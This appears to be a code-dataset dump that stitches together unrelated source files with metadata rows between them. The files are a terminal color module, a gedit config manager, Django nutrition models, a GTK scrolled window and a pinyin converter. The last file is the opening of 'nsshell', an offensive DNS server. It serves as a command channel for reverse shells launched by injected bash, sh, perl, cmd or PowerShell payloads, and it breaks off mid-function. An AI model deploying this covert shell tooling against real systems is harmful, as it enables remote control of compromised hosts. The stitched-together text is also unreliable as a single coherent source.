# Author: Konstantin Lepa <[email protected]>
"""ANSII Color formatting for output in terminal."""
from __future__ import print_function
import os
__all__ = ['colored', 'cprint']
VERSION = (1, 1, 0)
ATTRIBUTES = dict(
list(
zip([
'bold',
'dark',
'',
'underline',
'blink',
'',
'reverse',
'concealed'
],
list(range(1, 9))
)
)
)
del ATTRIBUTES['']
HIGHLIGHTS = dict(
list(
zip([
'on_grey',
'on_red',
'on_green',
'on_yellow',
'on_blue',
'on_magenta',
'on_cyan',
'on_white'
],
list(range(40, 48))
)
)
)
COLORS = dict(
list(
zip([
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white',
],
list(range(90, 98))
)
)
)
RESET = '\033[0m'
def colored(text, color=None, on_color=None, attrs=None):
"""Colorize text.
Available text colors:
red, green, yellow, blue, magenta, cyan, white.
Available text highlights:
on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_white.
Available attributes:
bold, dark, underline, blink, reverse, concealed.
Example:
colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink'])
colored('Hello, World!', 'green')
"""
if os.getenv('ANSI_COLORS_DISABLED') is None:
fmt_str = '\033[%dm%s'
if color is not None:
text = fmt_str % (COLORS[color], text)
if on_color is not None:
text = fmt_str % (HIGHLIGHTS[on_color], text)
if attrs is not None:
for attr in attrs:
text = fmt_str % (ATTRIBUTES[attr], text)
# Alignak mod
if color is not None:
text += RESET
return text
def cprint(text, color=None, on_color=None, attrs=None, **kwargs):
"""Print colorize text.
It accepts arguments of print function.
"""
print((colored(text, color, on_color, attrs)), **kwargs)
if __name__ == '__main__':
print('Current terminal type: %s' % os.getenv('TERM'))
print('Test basic colors:')
cprint('Grey color', 'grey')
cprint('Red color', 'red')
cprint('Green color', 'green')
cprint('Yellow color', 'yellow')
cprint('Blue color', 'blue')
cprint('Magenta color', 'magenta')
cprint('Cyan color', 'cyan')
cprint('White color', 'white')
print(('-' * 78))
print('Test highlights:')
cprint('On grey color', on_color='on_grey')
cprint('On red color', on_color='on_red')
cprint('On green color', on_color='on_green')
cprint('On yellow color', on_color='on_yellow')
cprint('On blue color', on_color='on_blue')
cprint('On magenta color', on_color='on_magenta')
cprint('On cyan color', on_color='on_cyan')
cprint('On white color', color='grey', on_color='on_white')
print('-' * 78)
print('Test attributes:')
cprint('Bold grey color', 'grey', attrs=['bold'])
cprint('Dark red color', 'red', attrs=['dark'])
cprint('Underline green color', 'green', attrs=['underline'])
cprint('Blink yellow color', 'yellow', attrs=['blink'])
cprint('Reversed blue color', 'blue', attrs=['reverse'])
cprint('Concealed Magenta color', 'magenta', attrs=['concealed'])
cprint('Bold underline reverse cyan color', 'cyan',
attrs=['bold', 'underline', 'reverse'])
cprint('Dark blink concealed white color', 'white',
attrs=['dark', 'blink', 'concealed'])
print(('-' * 78))
print('Test mixing:')
cprint('Underline red on grey color', 'red', 'on_grey',
['underline'])
cprint('Reversed green on red color', 'green', 'on_red', ['reverse'])
| agpl-3.0 | -3,544,723,343,725,155,000 | 28.096591 | 79 | 0.582894 | false |
rsgemignani/dotfiles | root/usr/lib/gedit/plugins/smart_highlight/config_manager.py | 1 | 2226 | # -*- encoding:utf-8 -*-
# config_manager.py is part of smart-highlighting-gedit.
#
#
# Copyright 2010-2012 swatch
#
# smart-highlighting-gedit is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import os
from xml.dom.minidom import parse
class ConfigManager:
def __init__(self, filename):
		if os.path.exists(filename):
self.config_file = filename
self.dom = parse(filename) # parse an XML file by name
#self.root = self.dom.documentElement
def get_configure(self, branch, attr):
root = self.dom.documentElement
nodes = root.getElementsByTagName(branch)
for i in range(0, len(nodes)):
if nodes[i].getAttribute('name') == attr:
return nodes[i].firstChild.nodeValue
def load_configure(self, branch):
root = self.dom.documentElement
nodes = root.getElementsByTagName(branch)
dic = {}
for i in range(0, len(nodes)):
dic[nodes[i].getAttribute('name')] = nodes[i].firstChild.nodeValue
return dic
def update_config_file(self, filename, branch, dic):
root = self.dom.documentElement
nodes = root.getElementsByTagName(branch)
for i in range(0, len(nodes)):
nodes[i].firstChild.nodeValue = dic[nodes[i].getAttribute('name')]
f = open(filename, 'w+')
#print(bytes.decode(self.dom.toprettyxml('', '', 'utf-8'), 'utf-8'))
f.write(bytes.decode(self.dom.toprettyxml('', '', 'utf-8'), 'utf-8'))
		f.close()
def boolean(self, string):
return string.lower() in ['true', 'yes', 't', 'y', 'ok', '1']
def to_bool(self, dic):
for key in list(dic.keys()):
dic[key] = self.boolean(dic[key])
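# Illustrative sketch (an assumption for clarity, not taken from the plugin itself):
# the methods above expect an XML config whose entries look roughly like
#
#   <smart_highlight>
#     <option name="MATCH_CASE">True</option>
#     <option name="MATCH_WHOLE_WORD">False</option>
#   </smart_highlight>
#
# so get_configure('option', 'MATCH_CASE') would return 'True' and
# load_configure('option') would return {'MATCH_CASE': 'True', 'MATCH_WHOLE_WORD': 'False'}.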
if __name__ == '__main__':
pass
| gpl-2.0 | 8,742,912,433,380,789,000 | 30.352113 | 82 | 0.699461 | false |
jsidew/jakidy | src/food/models.py | 1 | 1882 | from django.db import models
class Food(models.Model):
name = models.CharField(max_length=45)
protein = models.DecimalField(max_digits=4, decimal_places=2)
carbs = models.DecimalField(max_digits=4, decimal_places=2)
fat = models.DecimalField(max_digits=4, decimal_places=2)
price = models.DecimalField(max_digits=5, decimal_places=2)
notes = models.TextField()
@property
def calories_tot(self):
return int(round(self.protein*4 + self.carbs*4 + self.fat*9))
@property
def calories_protein(self):
return self.protein * 4
@property
def calories_carbs(self):
return self.carbs * 4
@property
def calories_fat(self):
return self.fat * 9
class Meal(models.Model):
name = models.CharField(max_length=45)
label = models.TextField()
foods = models.ManyToManyField(Food, through='Quantity')
@property
def foodlist(self):
return self.foods.all()
@property
def macros(self):
m = {
'protein': 0,
'carbs': 0,
'fat': 0,
'kcal': 0,
'price': 0
}
for f in self.foods.all():
g = self.quantity_set.get(food=f, meal=self).grams
m['protein'] = m['protein'] + f.protein / 100 * g
m['carbs'] = m['carbs'] + f.carbs / 100 * g
m['fat'] = m['fat'] + f.fat / 100 * g
m['price'] = m['price'] + f.price / 1000 * g
m['protein'] = int(round(m['protein']))
m['carbs'] = int(round(m['carbs']))
m['fat'] = int(round(m['fat']))
m['kcal'] = m['protein']*4 + m['carbs']*4 + m['fat']*9
m['price'] = round(m['price'], 2)
return m
class Quantity(models.Model):
food = models.ForeignKey(Food)
grams = models.DecimalField(max_digits=6, decimal_places=2)
meal = models.ForeignKey(Meal)
| gpl-3.0 | 3,854,542,961,084,282,000 | 32.017544 | 69 | 0.565887 | false |
netphi/deepin-ui | dtk/ui/scrolled_window.py | 1 | 21880 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 ~ 2012 Deepin, Inc.
# 2011 ~ 2012 Xia Bin
#
# Author: Xia Bin <[email protected]>
# Maintainer: Xia Bin <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gtk import gdk
from theme import ui_theme
from utils import remove_signal_id, color_hex_to_cairo
import gobject
import gtk
# p_range is the virtual width/height; its value is smaller than
# allocation.width/height when the scrollbar's width/height is smaller than
# the minimum scrollbar length.
# p_range = allocation.width/height - (min_bar_len - *bar_len*)
# where *bar_len* = (adj.page_size / adj.upper) * allocation.width/height
# With this mapping, 0~(adj.upper-adj.page_size) is mapped onto 0~p_range.
def value2pos(value, p_range, upper):
'''compute the scrollbar position by the adjustment value'''
if upper == 0: return 0
return p_range * float(value) / upper
def pos2value(pos, p_range, upper):
'''compute the adjustment value by the scrollbar position'''
if p_range == 0 : return 0
return pos * upper / p_range
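# Illustrative example (added for clarity, not part of the original module): the two
# helpers are inverses over the scrollable range.  Assuming upper=1000 and a virtual
# length (p_range) of 500:
#
#   pos = value2pos(400, 500, 1000)    # -> 200.0
#   value = pos2value(pos, 500, 1000)  # -> 400.0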
class ScrolledWindow(gtk.Bin):
'''Scrolled window.'''
def __init__(self, right_space=2, top_bootm_space=3):
'''Init scrolled window.'''
gtk.Bin.__init__(self)
self.bar_min_length = 50 #scrollbar smallest height
self.bar_small_width = 7
self.bar_width = 14 #normal scrollbar width
self.bar_background = ui_theme.get_color("scrolledbar")
self.right_space = right_space
self.top_bootm_space = top_bootm_space
self.h_value_change_id = None
self.h_change_id = None
self.v_value_change_id = None
self.v_change_id = None
class Record():
def __init__(self):
self.bar_len = 0 #scrollbar length
self.last_pos = 0 #last mouse motion pointer's position (x or y)
#last mouse motion timestamp, if user moved the window
#then the last_pos is likely become invalid so we need "last_time"
#to deal with this situation.
self.last_time = 0
self.virtual_len = 0 #the virtual window height or width length
self.bar_pos = 0 #the scrollbar topcorner/leftcorner position
self.is_inside = False # is pointer in the scrollbar region?
self.in_motion = False # is user is draging scrollbar?
self.policy = gtk.POLICY_AUTOMATIC
self._horizaontal = Record()
self._vertical = Record()
self.set_can_focus(True)
self.vallocation = gdk.Rectangle()
self.hallocation = gdk.Rectangle()
self.set_vadjustment(gtk.Adjustment())
self.set_hadjustment(gtk.Adjustment())
self.set_has_window(False)
def do_expose_event(self, e):
if e.window == self.vwindow:
self.draw_vbar()
return True
elif e.window == self.hwindow:
self.draw_hbar()
return True
else:
return False
def draw_vbar(self):
#img = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = self.vwindow.cairo_create()
cr.set_source_rgb(*color_hex_to_cairo(self.bar_background.get_color()))
cr.rectangle(0, 0, self.vallocation.width, self.vallocation.height)
cr.fill()
def draw_hbar(self):
cr = self.hwindow.cairo_create()
cr.set_source_rgb(*color_hex_to_cairo(self.bar_background.get_color()))
cr.rectangle(0, 0, self.hallocation.width, self.hallocation.height)
cr.fill()
def do_button_release_event(self, e):
if e.window == self.hwindow:
self._horizaontal.in_motion = False
if not self._horizaontal.is_inside:
self.make_bar_smaller(gtk.ORIENTATION_HORIZONTAL)
return True
elif e.window == self.vwindow:
self._vertical.in_motion = False
if not self._vertical.is_inside:
self.make_bar_smaller(gtk.ORIENTATION_VERTICAL)
return True
else:
return False
def make_bar_smaller(self, orientation):
if orientation == gtk.ORIENTATION_HORIZONTAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, int(self._horizaontal.bar_len), self.bar_small_width))
if self.hallocation.x == 0:
self.hwindow.shape_combine_region(region, self.top_bootm_space, self.bar_width - self.bar_small_width -self.right_space)
else:
self.hwindow.shape_combine_region(region, -self.top_bootm_space, self.bar_width - self.bar_small_width -self.right_space)
elif orientation == gtk.ORIENTATION_VERTICAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, self.bar_small_width, int(self._vertical.bar_len)))
if self.vallocation.y == 0:
self.vwindow.shape_combine_region(region, self.bar_width-self.bar_small_width - self.right_space, self.top_bootm_space)
else:
self.vwindow.shape_combine_region(region, self.bar_width-self.bar_small_width - self.right_space, -self.top_bootm_space)
else:
raise "make_bar_smaller's orientation must be gtk.ORIENTATION_VERTICAL or gtk.ORIENTATION_HORIZONTAL"
return False
def make_bar_bigger(self, orientation):
if orientation == gtk.ORIENTATION_HORIZONTAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, int(self._horizaontal.bar_len), self.bar_width))
if self.hallocation.x == 0:
self.hwindow.shape_combine_region(region, self.top_bootm_space, -self.right_space)
else:
self.hwindow.shape_combine_region(region, -self.top_bootm_space, -self.right_space)
elif orientation == gtk.ORIENTATION_VERTICAL:
region = gdk.region_rectangle(gdk.Rectangle(0, 0, self.bar_width, int(self._vertical.bar_len)))
if self.vallocation.y == 0:
self.vwindow.shape_combine_region(region, -self.right_space, self.top_bootm_space)
else:
self.vwindow.shape_combine_region(region, -self.right_space, -self.top_bootm_space)
else:
raise "make_bar_bigger's orientation must be gtk.ORIENTATION_VERTICAL or gtk.ORIENTATION_HORIZONTAL"
def do_scroll_event(self, e):
value = self.vadjustment.value
step = self.vadjustment.step_increment
page_size = self.vadjustment.page_size
upper = self.vadjustment.upper
        #TODO: need to handle other scroll types? I can only capture the two scroll types below at the moment
if e.direction == gdk.SCROLL_DOWN:
self.vadjustment.set_value(min(upper-page_size-1, value+step))
return True
elif e.direction == gdk.SCROLL_UP:
self.vadjustment.set_value(max(0, value-step))
return True
else:
return False
def do_leave_notify_event(self, e):
if e.window == self.hwindow :
self._horizaontal.is_inside = False
#if e.y < 0 and not self._horizaontal.in_motion:
if not self._horizaontal.in_motion:
self.make_bar_smaller(gtk.ORIENTATION_HORIZONTAL)
return True
elif e.window == self.vwindow:
self._vertical.is_inside = False
if not self._vertical.in_motion:
#if e.x < 0 and not self._vertical.in_motion:
self.make_bar_smaller(gtk.ORIENTATION_VERTICAL)
return True
else:
return False
def do_enter_notify_event(self, e):
if e.window == self.hwindow:
self.make_bar_bigger(gtk.ORIENTATION_HORIZONTAL)
self._horizaontal.is_inside = True
return True
elif e.window == self.vwindow:
self.make_bar_bigger(gtk.ORIENTATION_VERTICAL)
self._vertical.is_inside = True
return True
else:
return False
def do_motion_notify_event(self, e):
if not (e.window == self.hwindow or e.window == self.vwindow): return False
if e.window == self.hwindow and (e.state & gtk.gdk.BUTTON1_MASK) == gtk.gdk.BUTTON1_MASK:
self.make_bar_bigger(gtk.ORIENTATION_HORIZONTAL)
if self._horizaontal.last_time == 0:
self._horizaontal.last_time = e.time
elif e.time - self._horizaontal.last_time > 1000:
self._horizaontal.last_time = 0
self._horizaontal.last_pos = 0
if self._horizaontal.last_pos == 0 or self._horizaontal.last_time == 0:
self._horizaontal.last_pos = e.x_root
return True
deltaX = e.x_root - self._horizaontal.last_pos
upper = self.hadjustment.upper
#the pos maybe beyond the effective range, but we will immediately corrected
#it's value.
#the "invariant" is the "value" always in the effective range.
value = pos2value(self._horizaontal.bar_pos+deltaX, self._horizaontal.virtual_len, upper)
value = max(0, min(value, self.hadjustment.upper-self.hadjustment.page_size))
self.hadjustment.set_value(value)
self._horizaontal.last_pos = e.x_root
self._horizaontal.last_time = e.time
self._horizaontal.in_motion = True
return True
elif e.window == self.vwindow and (e.state & gtk.gdk.BUTTON1_MASK) == gtk.gdk.BUTTON1_MASK:
self.make_bar_bigger(gtk.ORIENTATION_VERTICAL)
if self._vertical.last_time == 0:
self._vertical.last_time = e.time
elif e.time - self._vertical.last_time > 1000:
self._vertical.last_time = 0
self._vertical.last_pos = 0
if self._vertical.last_pos == 0 or self._vertical.last_time == 0:
self._vertical.last_pos = e.y_root
return True
upper = self.vadjustment.upper
deltaY = e.y_root - self._vertical.last_pos
value = pos2value(self._vertical.bar_pos+deltaY, self._vertical.virtual_len, upper)
value = max(0, min(value, self.vadjustment.upper-self.vadjustment.page_size))
self.vadjustment.set_value(value)
self._vertical.last_pos = e.y_root
self._vertical.last_time = e.time
self._vertical.in_motion = True
return True
def calc_vbar_length(self):
self._vertical.virtual_len = self.allocation.height
if self.vadjustment.upper <= 1 or self._vertical.policy == gtk.POLICY_NEVER:
self._vertical.bar_len = 0
return
ratio = float(self.vadjustment.page_size) / (self.vadjustment.upper-self.vadjustment.lower)
# assert(self.vadjustment.upper >= self.vadjustment.page_size)
if ratio == 1:
self._vertical.bar_len = 0
else:
bar_len = self._vertical.virtual_len * ratio
if bar_len < self.bar_min_length:
self._vertical.virtual_len -= (self.bar_min_length - bar_len)
self._vertical.bar_len = max(bar_len, self.bar_min_length)
def calc_vbar_allocation(self):
self.vallocation = gdk.Rectangle(
self.allocation.width - self.bar_width, int(self._vertical.bar_pos),
self.bar_width, int(self._vertical.bar_len))
def calc_hbar_length(self):
self._horizaontal.virtual_len = self.allocation.width
if self.hadjustment.upper <= 1 or self._horizaontal.policy == gtk.POLICY_NEVER:
self._horizaontal.bar_len = 0
return
ratio = float(self.hadjustment.page_size) / (self.hadjustment.upper-self.hadjustment.lower)
# assert(self.hadjustment.lower == 0)
# assert(self.hadjustment.upper >= self.hadjustment.page_size)
if ratio == 1:
self._horizaontal.bar_len = 0
else:
bar_len = self._horizaontal.virtual_len * ratio
if bar_len < self.bar_min_length:
self._horizaontal.virtual_len -= (self.bar_min_length - bar_len)
self._horizaontal.bar_len = max(bar_len, self.bar_min_length)
def calc_hbar_allocation(self):
#assert 0 <= int(self.hpos) <= self.allocation.width - self.hbar_length,\
# "self.hpos %f self.allocation.width %f self.hbar_lengh %f" % (self.hpos, self.allocation.width,
# self.hbar_length)
self.hallocation = gdk.Rectangle(
int(self._horizaontal.bar_pos), self.allocation.height - self.bar_width,
int(self._horizaontal.bar_len), self.bar_width)
def vadjustment_changed(self, adj):
if self.get_realized():
# assert(self.vadjustment.value <= self.vadjustment.upper-self.vadjustment.page_size)
upper = self.vadjustment.upper
self._vertical.bar_pos = value2pos(adj.value, self._vertical.virtual_len, upper)
self.calc_vbar_allocation()
self.vwindow.move_resize(*self.vallocation)
self.queue_draw()
def hadjustment_changed(self, adj):
if self.get_realized():
# assert(self.hadjustment.value <= self.hadjustment.upper-self.hadjustment.page_size)
upper = self.hadjustment.upper
self._horizaontal.bar_pos = value2pos(adj.value, self._horizaontal.virtual_len, upper)
self.calc_hbar_allocation()
self.hwindow.move_resize(*self.hallocation)
self.queue_draw()
def add_with_viewport(self, child):
vp = gtk.Viewport()
vp.set_shadow_type(gtk.SHADOW_NONE)
vp.add(child)
vp.show()
self.add(vp)
def add_child(self, child):
self.add_with_viewport(child)
#raise Exception, "use add_with_viewport instead add_child"
def do_add(self, child):
self.child = None
gtk.Bin.do_add(self, child)
child.set_scroll_adjustments(self.hadjustment, self.vadjustment)
def do_size_request(self, requsition):
if self.child:
#print "sel size_request", (requsition.width, requsition.height)
self.child.do_size_request(self.child, requsition)
#print "child size request:", (requsition.width, requsition.height)
def do_size_allocate(self, allocation):
#print "do_size_allocate", allocation
self.allocation = allocation
if self.get_realized():
self.binwindow.move_resize(*self.allocation)
            #must come before calc_xxx_length, because we need the child to compute the adjustment value
if self.child:
(allocation.x, allocation.y) = (0, 0)
self.child.do_size_allocate(self.child, allocation)
self.update_scrollbar()
if self.get_realized():
self.make_bar_smaller(gtk.ORIENTATION_VERTICAL)
self.make_bar_smaller(gtk.ORIENTATION_HORIZONTAL)
def update_scrollbar(self, *arg, **argk):
if self.get_realized():
self.calc_vbar_length()
self.calc_hbar_length()
self.vadjustment.emit('value-changed')
self.hadjustment.emit('value-changed')
def do_unrealize(self):
#print "do_unrealize"
self.binwindow.set_user_data(None)
self.binwindow.destroy()
self.binwindow = None
self.vwindow.set_user_data(None)
self.vwindow.destroy()
self.vwindow = None
self.hwindow.set_user_data(None)
self.hwindow.destroy()
self.hwindow = None
# assert(self.get_realized() == True)
gtk.Bin.do_unrealize(self)
# assert(self.get_realized() == False)
def do_realize(self):
#print "self.get_parent_window():", self.get_parent_window()
#print "do_realize", self.get_realized()
# assert(self.get_realized() == False)
gtk.Bin.do_realize(self)
# assert(self.get_realized() == True)
self.binwindow = gtk.gdk.Window(self.get_parent_window(),
x=self.allocation.x,
y=self.allocation.y,
width=self.allocation.width,
height=self.allocation.height,
window_type=gtk.gdk.WINDOW_CHILD,
wclass=gtk.gdk.INPUT_OUTPUT,
event_mask=(self.get_events()| gdk.EXPOSURE_MASK | gdk.VISIBILITY_NOTIFY_MASK),
visual=self.get_visual(),
colormap=self.get_colormap(),
)
self.binwindow.set_user_data(self)
self.vwindow = gtk.gdk.Window(self.binwindow,
x=self.vallocation.x,
y=self.vallocation.y,
width=self.vallocation.width,
height=self.vallocation.height,
window_type=gtk.gdk.WINDOW_CHILD,
wclass=gtk.gdk.INPUT_OUTPUT,
visual=self.get_visual(),
colormap=self.get_colormap(),
event_mask=(self.get_events()
| gdk.EXPOSURE_MASK
| gdk.ENTER_NOTIFY_MASK | gdk.LEAVE_NOTIFY_MASK | gdk.BUTTON_RELEASE_MASK
| gdk.BUTTON_MOTION_MASK
| gdk.POINTER_MOTION_HINT_MASK | gdk.BUTTON_PRESS_MASK
)
)
self.vwindow.set_user_data(self)
#sefl.vwindow.get_
#self.vwindow.set_background(self.bar_background)
self.hwindow = gtk.gdk.Window(self.binwindow,
x=self.hallocation.x,
y=self.hallocation.y,
width=self.hallocation.width,
height=self.hallocation.height,
window_type=gtk.gdk.WINDOW_CHILD,
wclass=gtk.gdk.INPUT_OUTPUT,
colormap=self.get_colormap(),
visual=self.get_visual(),
event_mask=(self.get_events()
| gdk.EXPOSURE_MASK
| gdk.ENTER_NOTIFY_MASK | gdk.LEAVE_NOTIFY_MASK | gdk.BUTTON_RELEASE_MASK
| gdk.BUTTON_MOTION_MASK
| gdk.POINTER_MOTION_HINT_MASK | gdk.BUTTON_PRESS_MASK
)
)
self.hwindow.set_user_data(self)
#self.hwindow.set_background(self.bar_background)
if self.child:
self.child.set_parent_window(self.binwindow)
self.queue_resize()
def set_shadow_type(self, t):
#raise Warning("dtk's scrolledwindow didn't support this function")
return
def set_policy(self, h, v):
self._horizaontal.policy = h
self._vertical.policy = v
return
def do_map(self):
        gtk.Bin.do_map(self) #must come before self.xwindow.show(); don't know the reason.
self.binwindow.show()
self.hwindow.show()
self.vwindow.show()
if self.child and not self.child.get_mapped() and self.child.get_visible():
self.child.do_map(self.child)
def do_unmap(self):
#self.set_mapped(False)
self.binwindow.hide()
self.hwindow.hide()
self.vwindow.hide()
gtk.Bin.do_unmap(self)
def do_remove(self, child):
child.set_scroll_adjustments(None, None)
gtk.Bin.do_remove(self, child)
def get_vadjustment(self):
return self.vadjustment
def get_hadjustment(self):
return self.hadjustment
def set_hadjustment(self, adj):
remove_signal_id(self.h_value_change_id)
remove_signal_id(self.h_change_id)
self.hadjustment = adj
h_value_change_handler_id = self.hadjustment.connect('value-changed', self.hadjustment_changed)
h_change_handler_id = self.hadjustment.connect('changed', self.update_scrollbar)
self.h_value_change_id = (self.hadjustment, h_value_change_handler_id)
self.h_change_id = (self.hadjustment, h_change_handler_id)
def set_vadjustment(self, adj):
remove_signal_id(self.v_value_change_id)
remove_signal_id(self.v_change_id)
self.vadjustment = adj
v_value_change_handler_id = self.vadjustment.connect('value-changed', self.vadjustment_changed)
v_change_handler_id = self.vadjustment.connect('changed', self.update_scrollbar)
self.v_value_change_id = (self.vadjustment, v_value_change_handler_id)
self.v_change_id = (self.vadjustment, v_change_handler_id)
def _test_calc(self):
for i in xrange(0, int(self.vadjustment.upper-self.vadjustment.page_size), 30):
pos = value2pos(i, self._vertical.virtual_len, self.vadjustment.upper)
print "value:%f --> pos:%d" % (i, pos),
assert(pos <= self.allocation.height-self._vertical.bar_len),\
"pos(%f) should small than(%f)" % (pos, self.allocation.height-self._vertical.bar_len)
value = pos2value(pos, self._vertical.virtual_len, self.vadjustment.upper)
print "\t pos:%d -->value:%f" % (pos, value)
print "v_len:%f, height:%f, vir_bar_len:%d" % ( self._vertical.virtual_len,
self.allocation.height, self._vertical.bar_len)
gobject.type_register(ScrolledWindow)
| gpl-3.0 | -7,670,683,437,124,144,000 | 40.596958 | 137 | 0.603016 | false |
golden-tech-native/gd_facerecognize | server/common/hanzi_to_pinyin/pinyin.py | 1 | 2488 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Original code: https://github.com/cleverdeng/pinyin.py
Added features:
	1. A firstcode parameter can be passed in: if True, only the first letter of each character's pinyin is returned; if False, the full pinyin is output.
	2. Fix: ASCII letters are output unchanged.
	3. Fix: output still works when the separator is an empty string.
	4. Improvement: the path of the dictionary file can be specified.
"""
__version__ = '0.9'
__all__ = ["PinYin"]
import os.path
class PinYin(object):
def __init__(self):
self.word_dict = {}
def load_word(self, dict_file):
self.dict_file = dict_file
if not os.path.exists(self.dict_file):
raise IOError("NotFoundFile")
		with open(self.dict_file) as f_obj:
for f_line in f_obj.readlines():
try:
line = f_line.split(' ')
self.word_dict[line[0]] = line[1]
except:
line = f_line.split(' ')
self.word_dict[line[0]] = line[1]
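	# Note (added for clarity; the exact format is an assumption inferred from the
	# parsing above): each line of the dict file is expected to look like
	# "4E2D ZHONG1" -- the uppercase hex code point, whitespace, then the pinyin with
	# a trailing tone digit, so hanzi2pinyin(u'中') would yield ['zhong'].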
def hanzi2pinyin(self, string="", firstcode=False):
result = []
if not isinstance(string, unicode):
string = string.decode("utf-8")
for char in string:
key = '%X' % ord(char)
value = self.word_dict.get(key, char)
outpinyin = str(value).split()[0][:-1].lower()
if not outpinyin:
outpinyin = char
if firstcode:
result.append(outpinyin[0])
else:
result.append(outpinyin)
return result
def hanzi2pinyin_split(self, string="", split="", firstcode=False):
"""提取中文的拼音
@param string:要提取的中文
@param split:分隔符
@param firstcode: 提取的是全拼还是首字母?如果为true表示提取首字母,默认为False提取全拼
"""
result = self.hanzi2pinyin(string=string, firstcode=firstcode)
return split.join(result)
if __name__ == "__main__":
test = PinYin()
test.load_word('word.data')
string = "Java程序性能优化-让你的Java程序更快更稳定"
print "in: %s" % string
print "out: %s" % str(test.hanzi2pinyin(string=string))
print "out: %s" % test.hanzi2pinyin_split(string=string, split="", firstcode=True)
print "out: %s" % test.hanzi2pinyin_split(string=string, split="", firstcode=False)
| mit | -7,410,435,475,929,635,000 | 27.746667 | 87 | 0.551948 | false |
TheRook/nsshell | nsshell/__init__.py | 1 | 31810 | #!/usr/bin/env python
#rook
from __future__ import print_function
import base64
import itertools
import random
import Queue
import string
import sys
import subprocess
import re
import os
import datetime
from argparse import ArgumentParser, RawTextHelpFormatter
from twisted.internet import defer, stdio
from twisted.names import dns, server
from twisted.protocols import basic
from twisted.internet import reactor
from requests import get as rget
try:
#Load from the 'trusted' path that we load everything else from.
from nsshell.loader import loader
from nsshell.config import config
except ImportError:
#This should rarely happen
#The cwd could contain malicious python libraries which would be executed as root.
sys.path.append('.')
from nsshell.loader import loader
from nsshell.config import config
#The DNS server
#This class is intentionally more limited than 'client.Resolver' - we don't want an open relay
class ShellResolver:
def __init__(self, session, ip, hostname, loader):
self.ip = ip
self.session = session
self.hostname = hostname
self.loader = loader
self.chunk_keys = map(''.join, itertools.product(string.ascii_letters, repeat=2))
def lookupAllRecords(self, name="", timeout=0):
pass
def query(self, query, timeout=None):
answers = []
additional = []
authority = []
chunk_cmd = ""
direct = None
#8.8.8.8 returns at most 14 txt records per query.
page_size = 14
shell_type = "bash"
query_name = query.name.name
#query_type = dns.QUERY_TYPES[query.type]
triggered_payload = False
cmd_runner = False
#This is an alternate injection
#Some sh connectbacks may need this padding.
if query_name.startswith("{echo,'"):
query_name=query_name[7:]
shell_type = "sh"
        #strip off the hostname for this message
if query_name.endswith(self.hostname):
name_parts = query_name[0:len(query_name)-len(self.hostname)].split(".")
#A direct connection must end with our hostname
direct = False
else:
#This is direct because it could not have used an open resolver
name_parts = query_name.strip(".").split('.')
direct = True
#have we seen this session before?
sess_id = self.session.get_session(name_parts[0])
#Clients need to resolve the address of this server - here is our root
if query.type == dns.A:
#Resolve this server's A record.
cmd_server = dns.RRHeader(
name=query.name.name,
type=dns.A,
auth=True,
payload=dns.Record_A(address=self.ip, ttl=0))
answers.append(cmd_server)
if not sess_id:
log("", "", "query", str(datetime.datetime.now())+","+query.name.name+"\n")
elif query.type == dns.NS:
#Resolve this server's NS record
cmd_server = dns.RRHeader(
name=query.name.name,
type=dns.NS,
auth=True,
payload=dns.Record_NS(self.hostname, ttl=0))
answers.append(cmd_server)
#for debugging open resolvers
#size.x to find the max number of txt records returned.
elif query.type == dns.TXT and query.name.name.startswith("size"):
try:
txt_count = int(query.name.name.split(".")[-1])
except:
txt_count = 1
#Resolve this server's NS record
cmd_server = dns.RRHeader(
name=query.name.name,
type=dns.TXT,
auth=True,
payload=dns.Record_TXT("a" * 255, ttl=0))
for i in range(txt_count):
answers.append(cmd_server)
#We are only checking the size.
return defer.succeed((answers, authority, additional))
if not sess_id:
if len(name_parts) > 0:
if name_parts[0] in self.session.keyspace:
#We don't have this session, and it looks like the key will work as a session id.
sess_id = self.session.new(name_parts[0])
else:
sess_id = self.session.new()
#Did a known payload trigger this request?
triggered_payload = self.loader.get_payload(name_parts[0])
if triggered_payload:
self.session.set_data(sess_id, "payload", triggered_payload)
trigger_lower = triggered_payload.lower()
if trigger_lower.find("bash") >= 0:
shell_type = "bash"
elif trigger_lower.find("sh") >= 0:
shell_type = "sh"
elif trigger_lower.find("perl") >= 0:
shell_type = "perl"
elif trigger_lower.find("cmd") >= 0:
shell_type = "cmd"
elif trigger_lower.find("powershell") >= 0:
shell_type = "ps1"
else:
self.session.set_data(sess_id, "payload", query.name.name)
self.session.set_data(sess_id, "direct", direct)
#Direct connections do not have a protocol level limit of the number of results.
#This cap depends on the implementation of nslookup.
self.session.set_data(sess_id, "shell_type", shell_type)
else:
#Is this a direct connection?
direct = self.session.get_data(sess_id, "direct")
shell_type = self.session.get_data(sess_id, "shell_type")
page_size = self.session.get_data(sess_id, "page_size")
#These messages conditions need to be checked in all phases of the session
if self.session.check_exit(sess_id):
#send exit code
cmd_runner = "e=1"
elif not self.session.get_data(sess_id, "host") and direct == None:
#lets try a direct payload
direct_sess_id = self.session.new()
self.loader.get_connect(direct_sess_id, True, shell_type)
